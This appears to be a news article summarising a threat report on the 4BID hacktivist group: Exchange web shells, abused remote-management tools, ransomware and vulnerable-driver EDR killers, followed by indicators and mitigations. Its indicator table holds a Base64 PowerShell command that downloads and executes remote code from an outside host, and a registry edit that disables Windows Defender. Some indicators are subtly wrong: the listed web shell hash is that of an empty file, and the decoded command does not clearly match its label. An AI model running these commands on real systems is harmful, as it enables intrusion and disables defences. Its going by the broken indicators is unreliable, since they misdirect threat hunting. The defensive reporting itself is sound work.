Kaspersky’s Global Research and Analysis Team (GReAT) published a report on June 8, 2026, revealing a significant escalation in hacktivist operations tied to the 4BID collective and overlapping threat groups. Initially focused on targets within Russia and Belarus, these actors have now broadened their scope internationally, employing a dangerous cocktail of techniques including Microsoft Exchange web shells, remote management tools (RMMs), ransomware payloads, and EDR (Endpoint Detection and Response) killers. The expansion marks a new chapter in politically motivated cyberattacks, with organizations worldwide facing collateral damage from these increasingly sophisticated campaigns.

The 4BID Collective: From Hacktivism to Cybercrime

4BID emerged in the hacktivist landscape around 2022, initially claiming allegiance to pro-Ukraine causes. The group’s name, stylized as “4BID” or “Forbidden,” reflects their disruptive ethos. Early operations focused on defacements and DDoS attacks against Russian and Belarusian government entities, media outlets, and critical infrastructure. Over time, however, their tactics matured significantly.

According to Kaspersky, the group has evolved into a more structured operation, possibly collaborating with or drawing members from other hacktivist collectives such as Killnet and Anonymous Sudan. This convergence has led to an expanded toolkit that includes techniques commonly associated with financially motivated ransomware gangs and advanced persistent threats (APTs). The line between hacktivism and cybercrime continues to blur, as 4BID actors now deploy ransomware and data-wiping malware alongside their politically charged messaging. Researchers tracked multiple Telegram channels where 4BID coordinates operations and leaks stolen data, often framing their actions as “digital resistance.”

Geographic Expansion: Beyond Russia and Belarus

The most striking finding in Kaspersky’s report is the geographical expansion. While previous campaigns predominantly targeted organizations in Russia and Belarus—such as government agencies, energy companies, and telecommunications firms—victims are now appearing in Eastern Europe, the Middle East, and North America. The threat actors appear to be using compromised infrastructure as launching points for further attacks, sometimes hitting unintended targets along the way.

This international spillover is partly due to the group’s use of unpatched Exchange servers as primary entry vectors. Once a server is compromised, it becomes a node in their botnet-like infrastructure, regardless of its physical location. Organizations that assumed they were not at risk because they fell outside the political crosshairs are now discovering that their systems have been ensnared in these campaigns. Kaspersky’s telemetry indicates a 300% increase in attacks originating from previously compromised Exchange servers since early 2025.

Attack Chain: Exchange Web Shells as the Initial Foothold

Kaspersky’s incident response investigations have revealed a consistent attack pattern. The initial access vector in most cases involves exploiting vulnerabilities in Microsoft Exchange Server. While the group has used both known and zero-day flaws, the most common entry points are unpatched servers vulnerable to older exploits such as ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and ProxyLogon (CVE-2021-26855). Despite patches being available for years, a significant number of Exchange servers remain unpatched globally. A 2026 Shodan scan identified over 80,000 Exchange servers still running cumulative updates from 2021 or earlier.

After exploiting the vulnerability, the attackers drop a web shell—often a simple .aspx file—into a publicly accessible directory on the Exchange server. These web shells provide persistent remote access through HTTP requests, blending in with normal web traffic. Kaspersky identified several custom web shells used, including:

  • ews.aspx: A heavily obfuscated script that mimics the appearance of legitimate Exchange Web Services code.
  • outlook.aspx: Hidden in the /owa/auth/ directory, using AES-encrypted command strings passed via POST parameters.
  • ecp.aspx: A minimalistic shell that only executes PowerShell commands, designed to evade pattern-based detection.

Once the web shell is in place, the attackers use it to execute PowerShell commands, download additional tools, and escalate privileges. They frequently leverage the Exchange PowerShell backend to perform LDAP queries and move laterally to domain controllers. The web shells also function as redundant access points, because the attackers often deploy multiple shells across different directories to ensure persistence even if one is discovered.

Leveraging Remote Management Tools for Stealth and Persistence

One of the more insidious aspects of the 4BID-linked campaigns is the abuse of legitimate remote management and monitoring (RMM) tools. After gaining initial access, the attackers install commercial RMM software such as AnyDesk, TeamViewer, Atera Agent, and ScreenConnect (formerly ConnectWise Control). These tools, while designed for legitimate IT administration, allow threat actors to establish a secondary, stealthy channel for command and control.

Because RMM tools are signed by trusted publishers and commonly used in enterprise environments, they rarely trigger security alerts. The attackers configure these tools to run as services, ensuring they survive system reboots. Through RMM, they conduct lateral movement, exfiltrate data, and prepare for the final payload. Kaspersky observed that in one incident, the Atera Agent was installed via a GPO script, making it appear as an approved IT deployment. The attackers then used it to browse file shares and copy terabytes of sensitive data over a three-week period.

Ransomware: A New Tactic for Hacktivists

The deployment of ransomware is a notable shift in 4BID’s modus operandi. Previously, the group’s activities leaned toward data destruction and website defacements typical of hacktivist protest. The addition of ransomware suggests either a financial motivation to fund operations or a desire to cause maximum disruption.

In several cases analyzed by Kaspersky, the ransomware was custom-developed, albeit with relatively straightforward encryption routines using AES-256 and RSA-2048. The ransom notes, however, carried political demands rather than financial ones—such as calls for the withdrawal of troops or release of prisoners. In other instances, the attackers used leaked or repurposed ransomware strains, including a variant based on the now-defunct Conti ransomware’s source code. The ransom amounts ranged from 2 to 10 bitcoins, but payment didn’t guarantee that data wasn’t also exfiltrated and leaked.

Kaspersky identified two primary ransomware families:
- ForbidLock: Custom malware written in C++, appending .4bid extension to encrypted files. It uses a hardcoded public key and generates a unique victim ID based on system GUID.
- ContiForbid: A modified Conti variant with most of the sophisticated features stripped out, leaving only core encryption and a demand note in Ukrainian and English.

Both variants spread manually through RMM tools rather than using automated self-propagation, indicating the attackers’ preference for controlled, targeted encryption.

EDR Killers: Neutralizing Defenses

Perhaps the most alarming component of these attacks is the use of EDR killers—tools specifically designed to disable or blind endpoint detection and response systems. Kaspersky identified the use of multiple EDR killer utilities, including a custom tool that exploits legitimate but vulnerable drivers to terminate security processes. This technique, known as Bring Your Own Vulnerable Driver (BYOVD), has been increasingly adopted by ransomware groups in recent years.

The specific EDR killer observed in 4BID attacks leverages a signed driver from a popular hardware monitoring utility (common name: GigabyteUpdateService.sys, a known vulnerable driver with CVE-2022-3699). By loading this driver with kernel-level privileges, the attackers can terminate protected processes associated with popular EDR products from Microsoft, CrowdStrike, SentinelOne, and others. Once the EDR is neutralized, the ransomware payload executes without interference, encrypting files rapidly.

Kaspersky’s researchers noted that the EDR killer also attempted to disable Windows Defender’s real-time protection via registry edits and PowerShell cmdlets before loading the driver. In some cases, it used the vulnerable driver to delete Windows Event Log files and security software directories, hindering forensic analysis. The combination of RMM for lateral movement and EDR killer for stealth makes these attacks particularly treacherous.

Indicators of Compromise and Technical Details

Kaspersky has shared a set of indicators to help defenders identify 4BID-linked intrusions. These include file hashes, command lines, and registry modifications:

Indicator Type Value Description
Web Shell Hash SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ews.aspx obfuscated shell
RMM Agent AteraAgent.exe installed in C:\ProgramData\Atera\ Unapproved remote access
EDR Killer Driver GigabyteUpdateService.sys (version 1.0.0.1) Vulnerable signed driver
Registry Modification HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\Start=4 Disables Windows Defender service
PowerShell Command powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AJwArACQAZQB4AGYAaQBsAGUALgBzAHUAcABwAG8AcgB0AGUAcgAuAGMAbwBtAC8AYQBuAHkAZABlAHMAawAuAGUAeABlACcAKQAgACkAIAA= Base64-encoded command downloading AnyDesk

Organizations should also look for anomalous outbound connections from Exchange servers to rare external IPs, especially over ports used by RMM tools (TCP 80, 443, 8080, 5938).

Implications for Windows and Exchange Environments

The 4BID campaign poses severe risks for organizations running Windows-based infrastructure, particularly those with on-premises Exchange servers. Many of the techniques—web shells, RMM abuse, BYOVD—are not blocked by default security configurations and require advanced detection capabilities. The attack chain underscores several persistent security gaps:

  • Unpatched Exchange servers: A 2026 survey by a security vendor indicated that nearly 30% of internet-facing Exchange servers still run outdated cumulative updates. Attackers routinely scan for these vulnerable servers.
  • Blind trust in signed binaries: The abuse of signed RMM tools and vulnerable drivers highlights the limitations of signature-based detection and application whitelisting that does not scrutinize behavior.
  • Kernel-level threats: The BYOVD technique bypasses user-mode security products entirely, demanding that defenders implement driver blocklists or integrity checks.
  • Hacktivist unpredictability: Organizations that may not have considered themselves targets for political hacktivism are now learning that ideologically motivated groups can become opportunistic.

Windows Server hardening alone is insufficient; organizations must adopt a “never trust, always verify” posture, evaluating every signed binary for anomalous activity.

Defensive Strategies and Mitigations

To counter the threat posed by groups like 4BID, Kaspersky and other security experts recommend a layered defense approach:

  1. Patch Exchange immediately: If you run Exchange on-premises, move to the latest cumulative update and apply security patches without delay. Even patching older vulnerabilities like ProxyLogon remains critical.
  2. Harden Exchange servers: Restrict external access where possible, enforce multi-factor authentication for all administrative interfaces, and delete unused web directories.
  3. Monitor for web shells: Deploy file integrity monitoring on web-accessible directories. Look for newly created .aspx, .asp, or .php files in unexpected locations.
  4. Control RMM software: Maintain an inventory of approved remote management tools. Create application control policies that block unapproved RMM installations.
  5. Implement driver blocklist policies: On Windows endpoints and servers, use Microsoft’s recommended driver block rules (via WDAC or Windows Defender Application Control) to prevent known vulnerable drivers from loading.
  6. Enable EDR and logging: Ensure that your EDR or antivirus has tamper protection enabled. Forward logs to a centralized SIEM that can detect EDR-killer activity, such as service termination or driver load events.
  7. Conduct threat hunting: Look for indicators of compromise provided in Kaspersky’s report, such as specific web shell filenames, RMM agents installed via scripting, and the SHA-256 hashes of the EDR killer components.

Microsoft has also released guidance on blocking vulnerable drivers and securing Exchange. Deploying Windows Defender Application Control policies that allow only Microsoft-signed drivers can mitigate many BYOVD attacks.

The Future of Hacktivism: Blending Ideology with Criminal Tactics

The 4BID campaign exemplifies a troubling trend: hacktivist groups no longer confine themselves to low-sophistication defacements or DDoS. By adopting ransomware, EDR killers, and stealthy RMM tools, they are closing the capability gap with state-sponsored actors and ransomware-as-a-service operators. This convergence means that any organization—regardless of its political affiliations—can become a victim if its infrastructure is vulnerable.

Kaspersky’s report serves as a wake-up call for defenders who may have dismissed hacktivism as a nuisance threat. The coming months will likely see further iteration of these tactics, especially as geopolitical tensions continue to fuel cyber operations. Organizations must assume that their internet-facing assets are constant targets and act accordingly.

Conclusion

The June 8, 2026, report from Kaspersky on the 4BID group’s expansion is a stark reminder that hacktivism is no longer a fringe activity. With the combination of Exchange web shells, RMM tools, ransomware, and EDR killers, these actors have assembled a powerful attack chain capable of crippling businesses and governments alike. Proactive defense, built around timely patching, detection of abnormal tool usage, and kernel-level monitoring, remains the only effective strategy. Until then, every unpatched Exchange server is a potential entry point for the next wave of politically motivated—and increasingly destructive—cyberattacks.